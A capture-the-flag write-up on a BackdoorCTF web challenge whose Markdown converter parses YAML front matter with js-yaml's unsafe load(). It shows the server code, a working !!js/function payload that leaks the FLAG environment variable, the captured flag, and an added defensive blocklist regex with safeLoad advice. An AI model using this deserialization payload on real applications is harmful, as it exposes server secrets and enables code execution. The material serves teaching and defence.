Markdown to HTML Convertor
Our special markdown convertor supports yaml-frontmatter and underscore style templating.
https://backdoor-web250.herokuapp.com/
This problem is almost identical to another BackdoorCTF web100 challenge and, like it, provides its source code.
curl 'https://backdoor-web250.herokuapp.com/'
<html>
  <head>
    <title>Markdown to HTML Convertor</title>
    <style rel="stylesheet" type="text/cs" href="//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.0/normalize.min.css"></style>
  </head>
  <body>
    <h1>Markdown to HTML Convertor</h1>
    <form action="/convert" method="POST">
      <p>Our special markdown convertor supports yaml-frontmatter and underscore style templating.</p>
      <textarea name="markdown" rows="30" cols="70" placeholder="Enter markdown here">...</textarea>
      <br>
      <input type="submit" value="Convert!">
    </form>
    <p>Source code for this is available at https://github.com/backdoor-ctf/web250</p>
  </body>
</html>
Just like the previous problem, app.js requires the flag to be present in the process.env.FLAG variable, which is what we need to leak again.
// development only
if ('development' == app.get('env')) {
  app.use(express.errorHandler());
}

if(!process.env.FLAG) {
  console.error("No flag in environment");
  process.exit(1);
}
index.js handles parsing/processing submitted content...
var md = require( "markdown" ).markdown;
var yml = require('js-yaml');
Mustache=require("mustache");

exports.index = function(req, res){
  res.sendfile("public/index.html");
};

exports.convert = function(req, res){
  var markdown = req.body.markdown;
  var yaml = '';
  var data = null;
  if(markdown.slice(0,3)==='---') {
    var end = markdown.indexOf('---',3);
    if(end>-1){
      yaml = markdown.slice(3,end);
      try{
        data = yml.load(yaml);
      } catch(e){
        res.send("Incorrect YAML");
        return;
      }
      markdown = markdown.slice(end+3);
    }
    //No closing --- were found
    else
      markdown=markdown.slice(3);
  }
  //Now we template it up:
  var content = Mustache.render(markdown, data);
  res.send(md.toHTML(content));
};
The most important line of code here is "data = yml.load(yaml);", which is exactly where the front matter gets processed. A quick read through the js-yaml GitHub page turns up a very interesting description of yml.load: unlike safeLoad, it resolves JavaScript-specific tags such as !!js/function, so loading untrusted YAML with it lets the submitter define code that runs on the server...
Don't mind if I do...
---
function: !!js/function >
  function foobar() { return process.env.FLAG; }
---
{{function}}
Flag: fb1f85e4f37eb3bf31141cb1dcce1caf
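As an added defensive example (not from the writeup or the challenge repository), the gate below mirrors the front-matter split in index.js and refuses JavaScript-specific js-yaml tags before the loader ever sees them. It assumes the same '---' delimiters as the challenge code; the real fix is to call yml.safeLoad() (js-yaml 3.x) or rely on the default schema of load() in 4.x, which does not resolve these tags at all, with a check like this as a secondary layer only.

```javascript
// Tags resolved only by js-yaml's unsafe (DEFAULT_FULL_SCHEMA) loader.
// The list is a blocklist for detection; schema selection is the real control.
const JS_TAG = /!!js\/(function|regexp|undefined)\b/;

// Splits a submission the same way index.js does: returns the YAML between
// the leading '---' pair and the remaining markdown body.
function splitFrontMatter(markdown) {
  if (markdown.slice(0, 3) !== '---') return { yaml: '', body: markdown };
  const end = markdown.indexOf('---', 3);
  // No closing '---': index.js just drops the opening one, so do the same.
  if (end === -1) return { yaml: '', body: markdown.slice(3) };
  return { yaml: markdown.slice(3, end), body: markdown.slice(end + 3) };
}

// Returns a reason string when the submission must be refused, else null.
// Call this before yml.load() / yml.safeLoad() and before Mustache.render().
function rejectReason(markdown) {
  const { yaml } = splitFrontMatter(markdown);
  const hit = JS_TAG.exec(yaml);
  if (hit) return `unsafe YAML tag ${hit[0]} in front matter`;
  return null;
}

// Constructed sample: the payload from the writeup versus benign front matter.
const ATTACK_SAMPLE =
  '---\nfunction: !!js/function >\n  function foobar() { return process.env.FLAG; }\n---\n{{function}}';
const BENIGN_SAMPLE = '---\ntitle: hello\n---\n# {{title}}';

module.exports = { splitFrontMatter, rejectReason, ATTACK_SAMPLE, BENIGN_SAMPLE };
```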